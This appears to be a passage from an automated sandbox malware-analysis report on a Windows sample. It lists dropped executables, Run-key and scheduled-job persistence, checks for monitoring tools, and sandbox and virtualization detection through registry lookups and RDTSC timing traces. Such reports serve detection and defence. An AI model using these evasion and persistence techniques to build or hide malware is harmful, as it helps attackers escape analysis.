Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Drops PE files to the user directory

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\DocumentsHCFBFBAEBK.exe

Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6fc7e371fe.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run a0969106aa.exe

Drops PE files to the user root directory

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\DocumentsHCFBFBAEBK.exe

Jump to dropped file

Monitors registry run keys for changes

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Jump to behavior

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Window searched: window name: PROCMON_WINDOW_CLASS

Creates job files (autostart)

Source: C:\Users\user\DocumentsHCFBFBAEBK.exe

File created: C:\Windows\Tasks\skotes.job

Stores files to the Windows start menu directory

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6fc7e371fe.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6fc7e371fe.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run a0969106aa.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run a0969106aa.exe

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\file.exe

0_2_6C6A55F0

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Evasive API call chain: GetPEB, DecisionNodes, Sleep
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FCFF7 second address: 10FCFFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FCFFB second address: 10FCFFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F1226 second address: 10F1247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F528074EBDFh 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 jns 00007F528074EBD6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FC079 second address: 10FC07F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FC07F second address: 10FC08C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FC1E3 second address: 10FC1E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FC34F second address: 10FC355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FC355 second address: 10FC360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F528105F326h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FC360 second address: 10FC36F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F528074EBDAh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FC36F second address: 10FC379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FC74C second address: 10FC750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FF78B second address: 10FF836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 add dword ptr [esp], 2F9AC42Eh 0x0000000c movzx esi, cx 0x0000000f push 00000003h 0x00000011 mov di, cx 0x00000014 push 00000000h 0x00000016 mov ecx, dword ptr [ebp+122D3896h] 0x0000001c push 00000003h 0x0000001e push 00000000h 0x00000020 push eax 0x00000021 call 00007F528105F328h 0x00000026 pop eax 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b add dword ptr [esp+04h], 00000018h 0x00000033 inc eax 0x00000034 push eax 0x00000035 ret 0x00000036 pop eax 0x00000037 ret 0x00000038 mov dword ptr [ebp+122D1997h], eax 0x0000003e mov dword ptr [ebp+122D36FBh], esi 0x00000044 push BBEFA9F1h 0x00000049 jnc 00007F528105F32Ah 0x0000004f add dword ptr [esp], 0410560Fh 0x00000056 push 00000000h 0x00000058 push edx 0x00000059 call 00007F528105F328h 0x0000005e pop edx 0x0000005f mov dword ptr [esp+04h], edx 0x00000063 add dword ptr [esp+04h], 00000019h 0x0000006b inc edx 0x0000006c push edx 0x0000006d ret 0x0000006e pop edx 0x0000006f ret 0x00000070 mov dword ptr [ebp+122D1B4Fh], ebx 0x00000076 lea ebx, dword ptr [ebp+124535F8h] 0x0000007c mov edi, 524FD18Dh 0x00000081 xchg eax, ebx 0x00000082 push eax 0x00000083 push edx 0x00000084 push eax 0x00000085 push edx 0x00000086 jmp 00007F528105F334h 0x0000008b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FF836 second address: 10FF84B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528074EBE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FF8B9 second address: 10FF986 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007F528105F334h 0x0000000f push 00000000h 0x00000011 pushad 0x00000012 call 00007F528105F32Bh 0x00000017 mov dword ptr [ebp+122D29EDh], ecx 0x0000001d pop edx 0x0000001e mov edx, dword ptr [ebp+122D3AD6h] 0x00000024 popad 0x00000025 call 00007F528105F329h 0x0000002a jnc 00007F528105F32Ah 0x00000030 push eax 0x00000031 jns 00007F528105F338h 0x00000037 mov eax, dword ptr [esp+04h] 0x0000003b jmp 00007F528105F330h 0x00000040 mov eax, dword ptr [eax] 0x00000042 ja 00007F528105F332h 0x00000048 jnc 00007F528105F32Ch 0x0000004e mov dword ptr [esp+04h], eax 0x00000052 jl 00007F528105F334h 0x00000058 push ecx 0x00000059 jmp 00007F528105F32Ch 0x0000005e pop ecx 0x0000005f pop eax 0x00000060 push 00000003h 0x00000062 mov esi, dword ptr [ebp+122D3A76h] 0x00000068 mov edi, 3D9F62CCh 0x0000006d push 00000000h 0x0000006f stc 0x00000070 push 00000003h 0x00000072 mov ecx, dword ptr [ebp+122D1D39h] 0x00000078 mov si, bx 0x0000007b push A440E191h 0x00000080 push eax 0x00000081 push edx 0x00000082 push eax 0x00000083 push edx 0x00000084 push esi 0x00000085 pop esi 0x00000086 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FF986 second address: 10FF98C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FFA51 second address: 10FFA8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528105F331h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dx, 0D4Ch 0x00000010 push 00000000h 0x00000012 mov ecx, 2CDD2BCEh 0x00000017 js 00007F528105F32Ch 0x0000001d mov edi, dword ptr [ebp+122D3912h] 0x00000023 push 671B786Ah 0x00000028 push eax 0x00000029 push edx 0x0000002a push ecx 0x0000002b jnl 00007F528105F326h 0x00000031 pop ecx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11218B8 second address: 11218BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111F616 second address: 111F62E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F528105F333h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111F62E second address: 111F64B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528074EBE2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111F64B second address: 111F64F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111F64F second address: 111F653 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111F7C7 second address: 111F7D2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 js 00007F528105F326h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111FD89 second address: 111FD93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F528074EBD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111FD93 second address: 111FD9E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11200B8 second address: 11200BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11200BE second address: 11200D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F528105F326h 0x0000000a popad 0x0000000b jns 00007F528105F32Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
